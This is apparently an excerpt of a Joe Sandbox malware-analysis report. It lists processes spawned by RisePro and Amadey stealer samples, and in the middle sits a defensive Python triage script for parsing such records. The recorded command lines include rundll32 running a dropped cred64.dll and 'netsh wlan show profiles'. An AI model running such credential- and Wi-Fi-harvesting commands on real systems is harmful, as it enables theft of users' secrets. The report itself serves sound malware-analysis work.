Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 19
Start time: 21:34:17
Start date: 23/04/2024
Path: C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit): true
Commandline: C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase: 0xee0000
File size: 2'397'184 bytes
MD5 hash: A5E341D76C1BE40293C678679CA9A729
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 20
Start time: 21:34:17
Start date: 23/04/2024
Path: C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit): true
Commandline: C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase: 0xee0000
File size: 2'397'184 bytes
MD5 hash: A5E341D76C1BE40293C678679CA9A729
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 21
Start time: 21:34:18
Start date: 23/04/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 22
Start time: 21:34:23
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:21:34:23
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:21:34:24
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:21:34:28
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000012001\amert.exe"
                                                                                                                                                                                                                                        Imagebase:0x860000
                                                                                                                                                                                                                                        File size:1'954'304 bytes
                                                                                                                                                                                                                                        MD5 hash:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.2451043145.0000000000861000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000003.2360399183.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:21:34:31
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:21:34:32
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 21:34:33
Start date: 23/04/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 31
Start time: 21:34:34
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase: 0xd50000
File size: 2'397'184 bytes
MD5 hash: A5E341D76C1BE40293C678679CA9A729
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 21:34:37
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 21:34:38
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 21:34:38
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 21:34:38
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 21:34:40
Start date: 23/04/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase: 0x7ff7e52b0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 37
Start time: 21:34:41
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Imagebase: 0xa00000
File size: 1'954'304 bytes
MD5 hash: 3AB592D71455D47170AB784430AE8102
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000025.00000003.2448505563.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000025.00000002.2489688651.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 45%, ReversingLabs
Has exited: true

Target ID: 38
Start time: 21:34:42
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
Imagebase: 0xd0000
File size: 1'166'336 bytes
MD5 hash: 81A8F98229FF9CD694A2CB7389D22EF8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

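The process records above are what an analyst triages by hand: a stock svchost.exe from System32 with a normal `-k` service group is expected, while executables started from user-writable paths (AppData, Temp), especially ones that hold elevated privileges or carry Yara or AV matches, are the ones to pull apart, and the `-p <pid>` arguments of the WerFault.exe invocations tell you which processes crashed. The following Python script is an added example, not part of the Joe Sandbox report, that parses records in the report's `Key:Value` layout and applies those rules. The sample input is constructed from four of the records on this page (targets 30, 31, 35 and 37) trimmed to the fields the rules use; the rule thresholds and the "user-writable" and "trusted root" path patterns are the author's assumptions, not Joe Sandbox logic.

```python
"""Triage helper for per-process records in a Joe Sandbox-style report (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: four records from this report, reduced to the fields the rules use.
SAMPLE_RECORDS = r"""
Target ID:30
Path:C:\Windows\System32\svchost.exe
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Has elevated privileges:true
Has exited:false

Target ID:31
Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Has elevated privileges:false
Has exited:true

Target ID:35
Path:C:\Windows\SysWOW64\WerFault.exe
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
Has elevated privileges:true
Has exited:true

Target ID:37
Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Has elevated privileges:true
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000025.00000003.2448505563.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 45%, ReversingLabs
Has exited:true
"""

# Assumed path classes (not Joe Sandbox definitions): where unprivileged users can write,
# and where Windows and installed software normally live.
USER_WRITABLE = re.compile(r"^c:\\users\\|\\appdata\\|\\temp\\|\\programdata\\", re.I)
TRUSTED_ROOTS = re.compile(r"^c:\\(windows|program files( \(x86\))?)\\", re.I)
WERFAULT_PID = re.compile(r"\s-p\s+(\d+)")   # "-p <pid>" = the process WerFault reported on


@dataclass
class ProcessRecord:
    scalars: dict = field(default_factory=dict)   # "Key:Value" lines
    lists: dict = field(default_factory=dict)     # "Key:" header followed by bullet lines

    def get(self, key, default=""):
        return self.scalars.get(key, default)


def parse_records(text):
    """Split the report text into per-process records; blank lines separate records."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec, current_list = ProcessRecord(), None
        for line in (l.strip() for l in block.splitlines() if l.strip()):
            if line.startswith("•"):                      # bullet under the open list header
                if current_list is not None:
                    rec.lists[current_list].append(line.lstrip("• ").strip())
                continue
            key, _, value = line.partition(":")           # first colon only: values hold "C:\..."
            key, value = key.strip(), value.strip()
            if value:
                rec.scalars[key], current_list = value, None
            else:                                          # e.g. "Yara matches:" opens a list
                rec.lists.setdefault(key, [])
                current_list = key
        if rec.scalars:
            records.append(rec)
    return records


def triage(records):
    """Return ({target_id: [findings]}, sorted list of PIDs WerFault was invoked for)."""
    findings, crashed = {}, set()
    for rec in records:
        path, cmd, notes = rec.get("Path"), rec.get("Commandline"), []
        if USER_WRITABLE.search(path):
            notes.append("runs from a user-writable directory")
            if rec.get("Has elevated privileges") == "true":
                notes.append("elevated while running from a user-writable directory")
        elif not TRUSTED_ROOTS.match(path):
            notes.append("runs from an unexpected location")
        if path.lower().endswith("\\svchost.exe") and "-k" not in cmd.split():
            notes.append("svchost.exe without a -k service group")
        for rule in rec.lists.get("Yara matches", []):
            notes.append("yara: " + rule.split(",")[0].split(":", 1)[1].strip())
        for av in rec.lists.get("Antivirus matches", []):
            notes.append("av: " + av)
        if path.lower().endswith("\\werfault.exe"):
            m = WERFAULT_PID.search(cmd)
            if m:
                crashed.add(int(m.group(1)))
        findings[rec.get("Target ID")] = notes
    return findings, sorted(crashed)


if __name__ == "__main__":
    result, crashed_pids = triage(parse_records(SAMPLE_RECORDS))
    for tid, notes in result.items():
        print(f"target {tid}: {'; '.join(notes) or 'no findings'}")
    print("PIDs reported by WerFault:", crashed_pids)
```

The crashed PIDs are only half of a finding: match them against the process IDs in the full report (not shown in this excerpt) to learn which dropped binary each WerFault instance belongs to, and treat a crash in an elevated process from Temp as a sign the payload ran far enough to fault, not as a sign it failed to execute.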
Target ID: 39
Start time: 21:34:43
Start date: 23/04/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: false
Has administrator privileges: false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:21:34:43
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:21:34:51
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:21:34:59
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:21:35:00
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                                                                                                        File size:1'954'304 bytes
                                                                                                                                                                                                                                        MD5 hash:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.3263497208.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:21:35:00
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Imagebase:0x590000
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000003.2633330881.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                        File size:329'352 bytes
                                                                                                                                                                                                                                        MD5 hash:1C7D0F34BB1D85B5D2C01367CC8F62EF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                                                                                        Imagebase:0xd10000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
Start time: 21:35:05
Start date: 23/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 21:35:05
Start date: 23/04/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Imagebase: 0x7ff60c930000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 21:35:06
Start date: 23/04/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase: 0xfc0000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 21:35:06
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 21:35:06
Start date: 23/04/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
Imagebase: 0x4c0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 21:35:06
Start date: 23/04/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff78e2f0000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 21:35:06
Start date: 23/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 166
Start time: 21:35:48
Start date: 23/04/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Memory Dump Source
• Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
